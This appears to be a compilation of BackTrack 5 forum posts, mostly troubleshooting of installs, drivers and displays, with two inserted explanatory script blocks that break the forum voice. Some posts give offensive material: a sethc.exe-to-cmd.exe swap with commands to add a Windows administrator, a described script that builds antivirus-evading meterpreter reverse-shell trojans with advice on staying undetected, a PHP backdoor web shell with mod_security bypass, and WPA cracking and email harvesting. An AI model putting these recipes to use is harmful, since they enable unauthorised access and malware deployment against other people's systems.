Hello, I've already read a lot of posts about this but none resolved my problem, so here it goes:
(I'm using Windows 8... you know the unofficial windows... some guys picked up windows 7 and made some minor modifications to the CMD and uploaded it to the web as windows 8, but it is windows 7 all the same..)

I've just downloaded Backtrack 5 KDE 32-bit OS, and I was trying to burn it onto a DVD but it failed 3 times; that problem was solved, I had to clean my lens... Anyways, after that I had a DVD with Backtrack 5 on it and it was time to shutdown my computer. I started it again with the DVD inside the optical drive and it loaded the Backtrack 5 menu, I chose the 1st option and typed "startx". Everything was loading fine, when the desktop appeared I clicked "Install Backtrack", I followed the instructions and reached step 4, now (after all that reading) here is the problem:

1st- I want to dual boot Backtrack 5 with Windows 7 but it says that my computer doesn't have any OS installed.
2nd- I have two 250GB disks working together so it makes a 500 GB HDD (well on windows it shows that C: = 500GB so...) but in the option to use the entire disk it was only one of the HDDs (I think..) with 250GB.
3rd- The "side by side" option isn't there, probably because it doesn't identify my OS (as I said in 1st).

So yeah that is all...
If you want more information or some pictures please ask for 'em :cool: ...

I've been a complete idiot and ran apt-get autoremove on my backtrack 5 which lives in a usb hdd environment. This seems to have crippled my ability to boot into the OS (it's fully encrypted) as it reports a "cryptsetup failure due to options or bad password". Mounting in my sda ubuntu environment is fine using the same passphrase.

The verbose boot reveals that libgcrypt.so.11 has gone missing from /sbin/cryptsetup with an "error loading shared library, file/directory not found" complaint.

I have copied libgcrypt.so.11 from my ubuntu box into every possible region (I think) of the boot area of the external hdd: /tmp/sbin, /tmp/sbin/cryptsetup, /tmp/lib, /tmp/usr/lib, sequentially, and the only difference that's made is that the logical partition now no longer wants to mount in ubuntu.

Any help would be greatly appreciated as I have vital documentation on the disk.

my notebook has some HDMI and a DVI port via the Docking Station; sadly the output on both connections within BT5 is zero,
can anybody help? Which means my 32" Dell screen doesn't work and I've to use the notebook screen....

Why doesn't Metasploit come with MySQL and Postgres already configured? What confuses me is that some people are reporting that Postgres works fine in metasploit out of the box. Why would the configurations be different from one VM to another? Some posters are saying that certain metasploit builds work better than others. Others say that it's the ruby version that's at fault (but if you change it, other things break).

This seems to be in either 'BUG' territory, or there needs to be a much MUCH better guide on setting up databases in metasploit.

i have BT5-Gnome-64 installed on a little netbook working perfect.
except when I go to sleep at night and leave the netbook on, and yes this is really true, no jokes.

when I wake up I go and look at the netbook and it tried to change my background about 25 times and opened firefox 2 times.
and it moved gerix-wifi-cracker that was open to the second screen instead of the first and it closed my airmon-ng that was open to sniff for WEP packets.

now my question is: how is this possible??? and how can I solve it?

I have noticed it 2 times now at night but not over the day, and I have a camera in my room; no one touched the netbook that night, not me and no one else.

the netbook has the standard BT5-Gnome-64 version installed
and has the following specs.

So I am riding on a plane early on a Monday morning traveling for work as I too often do. It's a small plane, 2x2 rows type deal....and my companion is a trench coat mafia wearing, shoot up the school looking individual. He pulls out a little netbook and boots up his computer shortly after takeoff. To my surprise it boots up BackTrack. I'm doing everything I can to contain my ear to ear grin thinking this is my chance to be....."the quieter you are the more you'll hear."

This fool gets a command prompt and starts typing the likes of "run"...."command"....."start"....."go".....and after a few minutes just powers down by holding the button. I've been a user since BT2....educationally, recreationally, even at times professionally. I love the work you all do on this project, and cheers to the stupid who try to wield the dangerous.

The current PHP backdoor script is a little lacking in features and has a number of bugs in it. I've rewritten the script and done the following:

Uploads actually work, the method is a little rough but it's the only way to upload to a dynamic folder (the current one in BT tries to pass a text field for the directory and the file in the same form; that cannot be done in HTTP).

View source function displays as text/plain so it doesn't output HTML characters and execute client side code (the current one in BT doesn't fix output, making you execute any HTML and client side scripts in the document).

Download files with good error handling.

Good directory traversal functionality.

Editing of files.

Deletion of files.

Improved MySQL command execution.

Improved shell command error handling (warns if on safe mode).

Measures to bypass mod_security (it would otherwise prevent you from browsing certain directories or editing certain characters into a file).

An option to highlight likely database interaction files.

All code conforms to the principles of structured coding (all in if/else statements, no die() commands).

Allowed the gzip and download of a directory, this rarely works due to permissions.

Added the ability to CHMOD777 a folder, rarely works either.

Tested on Windows and Linux using PHP 4 and 5.

The only drawback this has in comparison to the other one is that it's over 400 lines long, but other than that it is superior in every way. I request that this tool be considered to replace the current PHP backdoor script in backtrack.

I have an HP dv8000 / dv8235nr laptop(http://h10025.www1.hp.com/ewfrf/wc/d...roduct=1843762) trying to run BT5 32bit KDE. I am doing a full install to the HD. This machine is dedicated to BT5/Testing. When I boot off the live CD, I notice that the screen resolution is the max (1440 x 900) and works fine. However, if I do a HD install, the max resolution I can get is 1024x768. So, I tried the Gnome version and I got the same result. When I searched these forums and google, I found out that I needed to download and install the nVidia drivers. The display adapter in this laptop is a NVIDIA GeForce Go 7400.

So my first attempt, I installed KDE and downloaded the drivers from nVidia. I followed these instructions.(http://www.backtrack-linux.org/forum...deo-cards.html) I ended up getting the driver installed after a couple other steps not mentioned in the article (had to do with prepare-kernel-sources). When I would start X, the system would get through the first three symbols and hang on the fourth. I could never get into X again. I have reinstalled BT532bKDE at least 14 times trying all the different combinations and tips from other searches and I still can not get it to work. If I install Gnome, I can get it to work fine but I prefer KDE.

I have tried the following command but all failed:
apt-get install nvidia-driver
apt-get install nvidia-drivers

I am at a loss. I am not sure what to do next. I have searched the forums for hours and hours trying everything I can find with no success.

Before I begin, mods if you think this is not appropriate just remove this thread and I'm sorry.

I have just started an Offshore VPN to keep you 100% anonymous and protect your privacy.

Now what can I use it for??

Now the best reason of all, total anonymity: what this means is your own internet service provider will not know what you're doing. Second, any blocked sites from your Internet service provider, school, work, and government will be accessible to you without their knowledge. Third, Hot Spots can be found everywhere now, which is very convenient but also dangerous. Using a VPN will prevent Hot Spot sniffing devices from viewing your logins, passwords and private data.

I'm sure that title can generate a lot of jokes anywho movin' on...
:D
I want to become a Penetration Tester. And the more I research the subject the more confusing it seems to become. I also want to be able to write my own tools etc... So I have started learning Python2.7, MIT's 6.00 Computer Science course youtube lectures, and downloaded a bunch of PDF's on Computer Science, Ethical Hacking, etc...

I have also looked into various courses on the subject and found a mountain of information that will take me well on into my 70's to finish reading. So I have come here to ask you guys where and what I need to learn in order to become a certified Pentesting nerd (and I say nerd lovingly). I live in Canada so any course/certification needs to hold weight in my country. I am also poor as hell and cannot afford to waste money on courses that will not help me achieve my goal. Thanks for your time and have a great day:confused:

I logged in as root, then I was browsing (e.g. saw a video online). Not long after, my computer logged itself out and gave a warning as shown below. How can I fix it?
Thank you.

Over the past 2 weeks I have been playing with different implementations on the usage of DD. I began this when I came across an article somewhere on the net regarding shred/sdelete and its ineffectiveness at wiping data; sadly I don't remember the link or I would post it. However, I decided to do a file backup on my laptop, and came across the fact that I saved the webpage. It is as follows.

The above experience really got me into thinking how quickly DD could overwrite freespace on a device, and if it was "cross-platform" enough for me in the sense of different file system architectures (ext2, ext3, ext4, NTFS, etc....). So, I did what any good true hacker would do and I started experimenting on my own, not just taking the articles on the net at face value. About 3 nights ago I happened to be booted into Ubuntu when I decided to try an implementation of DD using a method that translated the /dev/zero output to all 1s

This made me a file 512 bytes in size (512 is the default byte-size unless specified otherwise with bs=) that was filled with 1s for characters. A subsequent: "hexdump -C < foo" confirmed the output of 1s. At this point I started trying various implementations of bs & count combinations to come up with the quickest method for filling a certain device. I made the following observations.
All these were done on different partitions than the operating system in which I tested it. ie.... I filled /dev/sda2 while operating from /dev/sda1, and /dev/sda1 while operating from /dev/sda2; /dev/sda3 was windows so I just chose ubuntu to wipe from.

To see the current speed and progress of a dd operation you simply need to: "ps aux | grep dd", then note the process ID, then issue "kill -USR1 <pid>". This will make a progress dump on the screen doing the DD. The average speed for writing to ext2 & ext3 was found to be around: 22MB/second. The average speed for writing to my NTFS partition averaged out around 5MB a second; it started strong around 20MB a second, but averaged out to the 5 after roughly 1GB of writing.

It was when I happened to have missed a keystroke that the thought for the whole article came up! I was in ubuntu (/dev/sda2) and I had mounted (/dev/sda1) to my home directory ie (mount /dev/sda1 ~/mt)

I then changed to the mt directory (/dev/sda1) and started typing, but I was careless and I typed: "dd if=dev/zero | tr '' '\49' > foo". I then issued my kill -USR1 command to see how the progress was coming along and it was at a whopping 48MB/sec! Couldn't believe it...., So, I killed the original process and tried to figure out what had happened. In looking at my syntax I noticed that I did not include a "/" in front of the dev for the if= option. I was now using the (/dev/sda1) partition's /dev/zero file to write to foo.

So, here are some questions I have regarding my experience I hope the community can chime in on:

1) I wonder if anyone else has used dev/zero vs /dev/zero before.

2) Why is if=dev/zero double the speed of if=/dev/zero (Something about it not being the active O/S?)

3) Help me to improve the following syntax please; the goal being to be able to background a DD command that uses pipes and issue kill -USR1 to a variable versus parsing the running processes.

- Example 1:
Code:
dd if=/dev/zero of=foo & pid=$!
the user is then able to type
Code:
kill -USR1 $pid
and see the results

- Example 2:
Code:
dd if=/dev/zero of=foo | tr '' '\123' > foo & $pid=$!
The problem here is that it issues the pid to the tr command and not dd. I've tried various implementations placing the ampersand right after dd and such, but it all fails......And yes, I am aware that I could simply issue a test expr to make the value of $pid=$pid-1 so to speak, but I would like to learn the proper syntax so that I can understand why it doesn't work. The goal is to background DD so that I don't have to open another screen, while at the same time piping DD's output to a customized command so that I can make it something other than a "null" filled file.

V/r,
Snafu
Pffbt..

Quote:
I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass..
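For question 3 in the post above, here is an added example; it is not the poster's code nor anything from this thread. It assumes bash (process substitution is not POSIX sh) and GNU coreutils dd and tr (GNU dd prints a progress report on SIGUSR1). The point it shows: in `dd ... | tr ... > foo &`, `$!` is the PID of the last command in the pipeline (tr); if tr is wrapped in `>(...)` instead, dd becomes the command that `&` backgrounds, so `$!` is dd's PID and `kill -USR1` lands on dd. The file name, function names and variables are my own choices.

```bash
#!/bin/bash
# Added example (not from the forum post). Background a "dd | tr" pipeline while keeping
# dd's own PID, so that "kill -USR1 $DD_PID" reaches dd and not the last command of the
# pipeline. Assumes bash (process substitution) and GNU coreutils dd/tr.

# bg_dd_ones OUT BS COUNT: start dd in the background, feeding its output through
# "tr" into OUT so the file is filled with 0x01 bytes instead of zeros.
# Sets DD_PID. With "dd | tr > OUT &", $! would be tr's PID; with tr wrapped in >(...),
# dd is the command that "&" backgrounds, so $! is dd's PID.
bg_dd_ones() {
    local out=$1 bs=$2 count=$3
    dd if=/dev/zero bs="$bs" count="$count" > >(tr '\000' '\001' > "$out") &
    DD_PID=$!
}

# dd_progress PID: ask a running GNU dd for a progress report (printed on dd's stderr).
# Quietly does nothing if dd has already exited.
dd_progress() {
    kill -USR1 "$1" 2>/dev/null || true
}

# wait_for_size FILE BYTES: block until FILE is exactly BYTES long, giving up after ~5 s.
# Needed because the tr inside >(...) may still be flushing after dd itself has exited.
wait_for_size() {
    local f=$1 want=$2 i=0
    while [ "$i" -lt 50 ]; do
        if [ -e "$f" ] && [ $(( $(wc -c < "$f") )) -eq "$want" ]; then
            return 0
        fi
        sleep 0.1
        i=$((i + 1))
    done
    return 1
}

# all_ones FILE: succeed only if FILE contains nothing but 0x01 bytes.
all_ones() {
    [ $(( $(tr -d '\001' < "$1" | wc -c) )) -eq 0 ]
}

# Demo: 8 MiB of 0x01 bytes into a temp file, with one progress report while dd runs.
demo_file=$(mktemp)
bg_dd_ones "$demo_file" 1M 8
dd_progress "$DD_PID"
wait "$DD_PID"
if wait_for_size "$demo_file" $((8 * 1024 * 1024)) && all_ones "$demo_file"; then
    echo "ok: $demo_file holds 8 MiB of 0x01 bytes (dd pid was $DD_PID)"
fi
rm -f "$demo_file"
```

Two caveats a practitioner should keep in mind: `wait "$DD_PID"` returns when dd exits, not when tr has finished writing, hence the polling in `wait_for_size`; and SIGUSR1 progress reporting is a GNU dd feature (BSD dd uses SIGINFO), so on other platforms `dd_progress` will terminate dd rather than report on it. When the output file is a block device rather than a regular file, the same PID handling applies, only the `wait_for_size` check no longer makes sense.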

I am triple booting windows7, ubuntu 10.10 and BT5; BT5 is giving me a warning that 0 bytes are free.
How can I fix it without reinstalling?
If I run gparted using ubuntu, and increase the size of the BT installation, will it fix my issue?

hi, guys
my "new" "video" comes from trying to run the function automatic_autopwn in FAST-TRACK. I've problems with sqlite3 databases (not available in my Metasploit). I'm allowed to edit the file that is [autopwn.py] in the directory /pentest/exploits/fasttrack/bin/ftsrc, inserting the "parameters" of the postgresql database (supported). I know that this video is good for almost nothing! but at least I can use the button "2" after ./fast-track.py -I :)
Sorry for my English! Sorry for video quality :)
if you want to see: http://vimeo.com/26552328

I attach my file autopwn.py (for the configuration of postgresql in BT5 follow the tutorials in the forum)! many thanks bye!

As you may know, I am attempting to rise above the level of script kiddie knowledge of backtrack, metasploit, and indeed hacking.

my current roadblock is I believe, privilege escalation. I am working on a vulnerable vm where I have gained user level privileges. I have researched possible vulnerabilities and exploit code. Problem: I have always used metasploit to deliver code. I have no idea how to manually exploit a service or cause a desirable condition. Also, I don't understand the source code so I can understand it and what it does, how to use it to exploit the vulnerability.

I have done some research, I am reading the Wikipedia article on shellcode (dont laugh) and it states:

"Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits."

I take this to mean injecting the code into packets that are read by a vulnerable application and the code is executed(remote exploit?), or the same through a file(how do I get the file on the system?), or somehow causing the required condition on the local machine. (how?)

I've been experimenting with cracking WPA PSK using john the ripper and I have a few questions that I'm finding difficult to answer. I've got how to plug wordlists in and have john sort through them but it's customizing the rules that I don't understand. Like there's two words in the word list that are separate, "happy" and "him". I've combined them to make my wpa password as happyhim. How can I get John to pair words up next to each other that don't exceed a certain amount of characters. Basically I want to compile a very large wordlist that can be very flexible with all the words.

If anyone knows of any good step by step tutorials explaining all the different rules more in depth and how to use them I'd find it helpful. The rules file that comes with JTR is kind of confusing and I'm pretty sure I'll mess something up if I can't follow along.

The GuruPlug Plus uses a Marvell Kirkwood 6281A1, 1.2GHz processor and the Sheeva runs a 1.2 GHz Marvell Kirkwood 6281. The former is billed as an "ARM-compatible CPU (aka Feroceon)".

I am trying to install BT5 ARM on both the Sheeva and Guru Plus (just for jollies) but can anyone see any reason why it will *certainly* fail on either of these two processors? I haven't invested much time in doing this yet, and before I actually start to care it would be good to know if it is outright futile.

This is a very easy crack, allowing you to open a windows command prompt with system privileges at log-in. Shouldn't take more than 3 minutes. It replaces sethc.exe, which can be invoked at start-up by pressing shift five times (something to do with contrast), with cmd.exe: since you haven't logged in yet it opens a command prompt with system privileges (runs in backtrack).
Code:
mkdir /mnt/ntfs
mount -t captive-ntfs /dev/hda1 /mnt/ntfs
cd /mnt/ntfs/windows/system32
mv sethc.exe sethc.old; cp cmd.exe sethc.exe
sync
cd ~
umount /mnt/ntfs
shutdown r now
To make a new admin that you can log in to (apart from EVERYTHING else that you can do) use the following commands (replace admin with the username and pass with your password)
Code:
NET USER admin pass /add
NET LOCALGROUP administrators admin /add
reboot and you're done.
No need to bother with cracking people's passwords (god forbid, this may take years, as with mine). :cool:
(please only use on your own computer or with other people's permission)
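The swap described in the post above leaves a simple fingerprint on disk: sethc.exe becomes a byte-for-byte copy of cmd.exe, usually next to a stray sethc.old. The following is an added, defender-side check, not code from the post or from BackTrack; point it at a mounted Windows system32 directory (as in the post, /mnt/ntfs/windows/system32) and it compares the two files by SHA-256. It assumes sha256sum or shasum exists on the examining host; the function names, the script name and the exit codes are my own conventions.

```sh
#!/bin/sh
# Added example (not from the forum post): a defender-side check for the sethc.exe/cmd.exe
# swap. Pointed at a mounted Windows system32 directory, it reports whether sethc.exe is
# byte-identical to cmd.exe and whether a leftover sethc.old exists.
# Assumes sha256sum or shasum on the examining host; the directory is a parameter.

# file_sha256 FILE: print the SHA-256 hex digest of FILE with whichever tool is installed.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# check_sethc SYSTEM32_DIR
# Exit status: 0 = sethc.exe differs from cmd.exe, 1 = sethc.exe is identical to cmd.exe,
# 2 = sethc.exe missing. A stray sethc.old (what the recipe above leaves behind) is
# reported but does not change the status, since a legitimate update could leave backups too.
check_sethc() {
    dir=$1
    if [ ! -f "$dir/sethc.exe" ]; then
        echo "$dir/sethc.exe: missing"
        return 2
    fi
    if [ -f "$dir/sethc.old" ]; then
        echo "$dir/sethc.old: present (renamed original?)"
    fi
    if [ -f "$dir/cmd.exe" ] && \
       [ "$(file_sha256 "$dir/sethc.exe")" = "$(file_sha256 "$dir/cmd.exe")" ]; then
        echo "$dir/sethc.exe: ALERT, identical to cmd.exe"
        return 1
    fi
    echo "$dir/sethc.exe: differs from cmd.exe"
    return 0
}

# Usage (hypothetical script name): ./check_sethc.sh /mnt/ntfs/windows/system32
if [ "$#" -ge 1 ]; then
    check_sethc "$1"
fi
```

The identical-hash test is deliberately cheap and only catches this exact swap; a replacement that is not a plain copy of cmd.exe would pass it, so the stronger check is comparing sethc.exe against the known-good signed binary for the same Windows build. Note also that NTFS mounted under Linux is case-sensitive about the names you pass, and that full-disk encryption removes the offline edit path this recipe depends on.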

So I've troubleshot as much as I can to figure out exactly what is going on. I'm running Honeycomb 3.2 with the Tiamet 2.0 kernel. I ended up going line by line through the bootbt shell script and found that at line:

Code:
mount -o loop,noatime -t ext2 $kit/bt5.img $mnt
I'll receive:

Code:
ioctl LOOP_SET_FD failed: Device or resource busy
I've tried rebooting. I've reinstalled busybox multiple ways to no avail.
Is there something different with Honeycomb 2.6 as a result of the kernel?

So I boot up the DVD-RW I burned it on, burned at slowest speed.
I let it boot, I get the interface to select what I want to boot... memtest or safe mode etc...
I boot up the default option, text mode... It loads everything up and then I get a black screen.

It's black as if the monitor is turned off, completely black.

I tried both the iso and the dvd itself in vmware, and it boots up fine. Where I would get a black screen,
vm gets the backtrack background and then the place where I can type startx, then it boots up and I can install...

So probably there's some problem with my graphics card or I am missing drivers?

I've got BT5 (GNOME) installed on my VM at the moment for several testings to make certain whether I'll make it my Prime OS or not and I'm having some issues that I'm not sure where to turn to with.
for the record - I've looked in ubuntu forums and google for answers but none helped so I'm hoping here will find salvation.

issue 1:
Tried installing Compiz fusion, emerald and the rest of those packages. Download completed successfully & it seems to be installed fine but I can't run any of the features.
Is it caused by the fact this is on a VM? or is there a known issue with BT5 and compiz fusion?

I am just posting as I currently have a wireless usb adapter wusb600n for my pc and I am trying to get it working with Backtrack 5 on VMware. I have seen many posts on the internet pertaining to this issue however they all seem a bit old and I can't seem to follow them all the way as some of the links are down. I have managed to get backtrack 5 to recognise the usb adapter and it shows up as an interface in airmon-ng, however when I try to put it into monitor mode the device locks up and I have to unplug it and reattach to get it recognised again.

I was wondering if someone could please help me in getting this adapter working on BT5 as I really want to use it and from what I have read other people have got it working? Also as the other posts on this issue are now over 1yr old has this issue not been resolved and why not lol?

I am using the Backtrack 5 Gnome 32-bit edition. I have installed it as a persistent install on my pendrive. Whenever I boot into it, regardless of whether I have created another user or not, it automatically logs in as root. I want to make it in such a way so that it asks me for the username and password every time I boot into it.

I know that I have to do something with the initrd. I edited it as mentioned in the LiveCD Customization article on ubuntu website, but then I am not able to login.

Excuse my ignorance, but after a reboot, my home folder link in the drop down "places" isn't working, it comes up with an error from "KPackage" that says
Quote:
This item is not supported by your backend, or it is not a file
then lists root.

even if I drag a homefolder to the launch bar it returns the same problem.

As the topic says, my drivers work great on the live usb
Sound , Video , Audio....
But when it comes to installing BT5 to my hard drive, my graphics card stops working, my sound quits on me and my wifi is gone.....
Or is there a switch somewhere , like there was for network in bt4?

I'm trying to spoof my mac address for when I use aircrack, and I can change the mac address with macchanger, but macchanger only changes my mac for wlan0, and when I start wlan0 again, it sets up mon0 as the monitor interface, but mon0 uses my default mac address instead of the spoofed one.
I basically set it up like this...
Code:
airmon-ng stop wlan0
macchanger --mac ##:##:##:##:##:## wlan0
airmon-ng start wlan0
wlan0 keeps the spoofed mac while mon0 uses the default.
I've tried using macchanger --mac ##:##:##:##:##:## mon0, but that doesn't work.
Any ideas?

I have BackTrack 5 KDE 64 bit installed next to several other operating systems (Win 7, ubuntu, mint) on a Dell Studio XPS 1640. Everything is working fine except this annoying beep at poweroff. It lasts for about 1 second and is audible immediately when I execute the "poweroff" command via pressing enter.
In blacklist.conf I tried blacklisting pcspkr and also snd_pcsp to no avail, so now I am wondering what else I can try or see why it is even beeping at all?

I'm using a dell inspiron n5110 with the following wireless card: Intel®Centrino® Wireless-N 1000, 802.11 g/n
when I try to get airmon-ng working, it won't say anything under chipset, driver, etc.
from the research I've done it seems as though it should be natively supported (maybe slightly different model), and if not I would definitely say supported with a download. any help/pointers?
Maybe I'm just entering the command wrong? ("airmon-ng start wlan0 (or start wifi, neither works)")

I have been doing some research in getting my driver to support monitor mode.. from everything I read it's not possible; sure, certain things can be done but it cannot be fully compatible with the wl driver.. this was over a year ago and I'm wondering if anything new has come up that may give my driver another chance....thanks

- The Wifi network I try to access is using WPA-PSK and I've already found out that key.
- However, the router's DHCP is disabled, and I do not know its IP Range, as well as its subnet mask and default gateway.

Therefore, I cannot connect to that Wireless network.

Is there any way/tools to detect the IP Range of the network from the outside ?! My friend told me that I can use some tool like Wireshark to sniff packet and find out that IP range, but how can I sniff when I cannot connect to it ?!

Is there any tool in Backtrack that can help me to do it ?! If yes, please guide me a little bit on how to use it since I'm not an expert in using Linux.

Now I want to install backtrack 5 on the freespace using the swap in both os's. Naturally I want to make sure I don't fubar my Ubuntu install. What would be the correct procedure to do this? I've heard that backtrack uses grub 1.5 and Ubuntu uses 2. Has anyone done this before and can give me some pointers?

Hey,
I wrote a simple shell script to bypass AVs like AVG, Avast and Emsisoft.
It certainly will not bypass all AVs. Just the easy ones :p
The script can be downloaded here : http://home.base.be/%72%68%69%6E%63%...reatetrojan.sh
I saw somebody demonstrate this method of av evasion in a youtube video and I decided to write a script for it to speed up the process.
The script lets you choose between 2 payloads: the meterpreter/reverse_tcp and the shell_reverse_tcp. (feel free to add more)
It lets metasploit generate the code for the payloads and then puts them in a template.c from the metasploit framework and fills it with some random junk and then compiles it with mingw32. So be sure you have mingw32 installed :)

Code:
apt-get install mingw32
The script also has the option to use your external ip address and will look it up for you on a Belgian website.
This is just a fun feature I added. So don't use it for anything illegal :D

If you want to scan the trojan the script creates with multiple AVs, please use http://vscan.novirusthanks.org/
And be sure to select the "do not distribute this sample" option so it won't get detected that quickly.

If it gets detected after a month or so, you can always change the variable names and the random junk in the c file.
This will probably make it undetectable again for the easy AVs of course :p

After I installed the driver and the CUDA toolkit I am having a problem on startx (followed http://www.backtrack-linux.org/wiki/...A_On_BackTrack on installing the driver and toolkit). I tried adding BusID to xorg.conf, however it made me run into a black screen after startx. Although I know X is running because when I press CTRL-ALT-DEL and then Enter I can shutdown properly. I think this problem is caused by my monitor being connected to the Intel graphics card. So when I use the Nvidia graphics card nothing's output to the monitor. If I delete xorg.conf I can successfully boot into GNOME. If I change Grub's setting to i915.modeset=1 I will run into a black screen while booting. Can anyone tell me how to make my Nvidia graphics card work properly?

Hello Forum, I have spent around 5 days trying to get my wireless card to work. It worked when I initially installed backtrack, but after I installed Cuda and upgraded the distribution I have not been able to even see the wireless card. I am running off of a xps computer and I have tried many things with much failure.
I have tried using the linux and xp drivers, but that has not gone so well. Here is the linux driver
rtl8192u_linux_2.6.0006.1031.2008
With that, when compiling the makefile this occurred:
make[1]: Entering directory `/usr/src/linux-source-2.6.38'

WARNING: Symbol version dump /usr/src/linux-source-2.6.38/Module.symvers
is missing; modules will have no dependencies and modversions.

Greetings all,
Yaakov Goldberg recently developed a new tool for any Linux distribution. Yaakov released it with this statement, "the tool is called uberharvest and it is intended to be used as an information gathering tool for harvesting emails from a URL entered by the users. In addition, the user can use the tool to scan a bunch of URLs from a text file and then return all emails that have been found in each website. The tool is completely FREE and can be used for pentesting and hacking activities. To get the tools go through the following steps.

New to linux based stuff in general, used backtrack 3 in the past, anyway I made a liveCD of BT5, used the install backtrack shortcut on the desktop to install as a dualboot with windows 7, want to change it to start up windows by default if no input is given instead of BT5, looked for the lilo.conf in the etc folder and other places, can't find it with the shell commands, so what should I do?...

I have installed BackTrack5 on my HDD. When I boot my computer, I enter my username (root) and the password.
Then I want to start the GUI Environment, so I type the command startx. But then I have only a black screen.
My TV says that there is no connection (cable = HDMI).
Is it a problem with the HDMI cable or is there something else wrong? When I boot the LiveCD everything works. :S

While I have in the past been focused on Windows exploitation (and a beginner with that) I find myself having to expand my horizons. In keeping in line with my training, I need to enumerate information on the machine (vm) that I want to attack. Unfortunately I have little idea where to start. The book I have access to at the moment seems fixed on Windows enumeration, and google has not been much better. I see results on Linux NIC enumeration.

Steps taken so far:
Scanned my network and found a "victim".
Scanned the host and performed port, OS and version detection.
"banner grabbing", connecting to the services with netcat.

At this point there is a gap in my knowledge. I know that eventually I will need to crack passwords and eventually gain access to the system, but I do know that if I want to gain access through one of the open services, I will need to enumerate the users and possibly other information on the machine. Can anyone point me in the right direction, or point me to some resources?

I'm trying to install Flash Player, but since I'm a super newbie in both Linux and BackTrack I failed. :confused:
I tried to download it by apturl via the link (apt:adobe-flashplugin?channel=$distro-partner) they provided, but it says "The channel '-partner' is not known" (don't know what it says actually).
I tried the .rpm with alien, but again failed. :(
Then I found this topic: Backtrack 5 - How to get flash player working on Gnome / KDE x64
I did it halfway (not sure I did it correctly, since I didn't get any response from the rm commands), then I realized that Adobe has stopped supporting Square and the link redirects to the Flash Player 11 beta. I tried to install it with the commands in the topic (tar xvfz and mv -f), but then again I couldn't use it in Firefox. :mad:

Okay, let me start by saying I am a complete and utter Linux noob. I really need some help here...

I recently bought an Alfa AWUS036NH wireless USB adapter. I needed the wireless adapter because I am using VMware Workstation to run BT5-gnome-32 on my Windows 7 Dell Studio XPS.

I have seen some users saying that the adapter works out of the box for them. Not the case for me. I have the CD which contains a driver for a Linux 2.6 kernel. This .tar.gz file, when extracted, becomes a folder named "rt18187_linux_26.1025.0328.2007". This folder contains two other .tar.gz files which, when extracted, become folders named "ieee80211" and "rt18187".

But... I have no idea how I'm supposed to install the driver. I wish there was a way to cheat and use the "apt-get install" command, but I can't figure that out. I have looked up everything from how to install .tar.gz files to websites and forums on this driver in particular... and I am still stumped.

All the information that I DO find is over my head. I'll follow instructions when I read other threads on the topic, and there are always problems that I can't solve and that aren't discussed either. This is becoming very frustrating, especially considering all this trouble is over a wireless internet adapter and I've never had a problem with that in my life.

PLEASE HELP ME! Thanks in advance for any help you guys can offer. I like the idea of Linux and I really want to use BT5 for Aircrack purposes and as a start into the world of Linux operating systems... But DAMN, it's really difficult for me to get this driver working.

I am running BackTrack 5 KDE x86 (fresh install, switched from BT5 GNOME, where the .bundle installed and ran perfectly). The installer runs with no errors; however, when I attempt to start VMware Player, I receive the following messages:

Code:
C header files matching your running kernel were not found. Refer to your distribution's documentation for installation instructions
Code:
Before you can run VMWare Player, several modules must be compiled and loaded into the running kernel. Kernel Headers for version 2.6.38 were not found.
It then asks me to specify a location.

The linux-headers package has been installed, and can be seen in the default directory which vmplayer points to; however, even after selecting the folder, vmplayer will not recognize it. Hardware is an Asus K50IJ (Intel).

Any help regarding this matter would be greatly appreciated. Thank you for your time.

1. To get the login GUI, go to (Dragon Icon start button), then (Settings), and then click on (System Settings). Scroll down to where it says (Login Screen). In the Login Screen GUI you will see the tabs, which should be (General)(Dialog)(Background)(Theme)(Shutdown)(Users)(Convenience). Click on the one that says (Theme) and you should be able to see the buttons (Install new theme)(Remove Theme)(Get new theme). Click on (Get New Theme) and download the themes you want. I got a theme called Asphyxia, which you can type into the search to see what I'm talking about. Once you have the theme that you want, click on that theme and click Apply.

# To start kdm even if it is not the default display manager, change
# HEED_DEFAULT_DISPLAY_MANAGER to "false."
HEED_DEFAULT_DISPLAY_MANAGER=true
DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager

# If we upgraded the daemon, we can't use the --exec argument to
# start-stop-daemon since the inode will have changed. The risk here is that
# in a situation where the daemon died, its pidfile was not cleaned up, and
# some other process is now running under that pid, start-stop-daemon will send
# signals to an innocent process. However, this seems like a corner case.
# C'est la vie!
if [ -e $UPGRADEFILE ]; then
    SSD_ARGS="--pidfile $PIDFILE --startas $DAEMON"
else
    SSD_ARGS="--pidfile $PIDFILE --exec $DAEMON"
fi

exit 0
If you do not change this information, it will not load your login GUI.

3. Now open up Terminator, or whatever shell you're using, and type this command in there.
Code:
root@bt:~# update-rc.d kdm defaults
4. Reboot and see if it loaded. If it didn't, then use this next command, because the shell script might not have got the executable bit. Go into the folder first, then use the command. Use the command "cd /etc/init.d" without the quotes.

Code:
root@bt:/etc/init.d/# sudo chmod +x kdm
5. If you need to go back to the CLI, then look at this page: CLI or KDM Theme

Loading Boot Splash

For this one, simply go to (Dragon Icon start button), then (Settings), and then click on (System Settings). Click on (Workspace Appearance), then on (Splash Screen), and then on (Get New Themes...). I used the Asphyxia one, which can be found there; just type it in the search box. Click on your splash screen and select Apply. You're done.

Change background wallpaper

Right click anywhere on your desktop and in the mouse menu just select (Folder View Settings Alt+D, Alt+S), which should be at the bottom. It should open up with the wallpaper. Click on Get New Wallpapers... and I leave the rest to you.

I am trying to expand my horizons with exploit development.
And thus I am wondering how you find your zero-days?
My methods now are:
If there is source code:
1. I pick a product I frequently use.
2. I launch cscope to find dangerous functions (memcpy, strcpy, execvl, etc.).
3. For all these functions I back-trace the arguments to their origin.
4. In case the origin is user-supplied or otherwise from a source that could be tampered with, I write this down.
5. After all of the functions have been back-traced I attach gdb to the binary and try to malform the buffer the way I require.
6. I document this and then try to stabilize the exploit.

In case I do not have the source code, I do the same,
but using IDA or Radare (depending on whether it's a Windows app or a Unix app).

I know I should fuzz. But often I just can't be asked,
since I don't want to write a specific fuzzer for each application. I never got anything out of it and thus I don't find it rewarding.

What are your ways to achieve this?
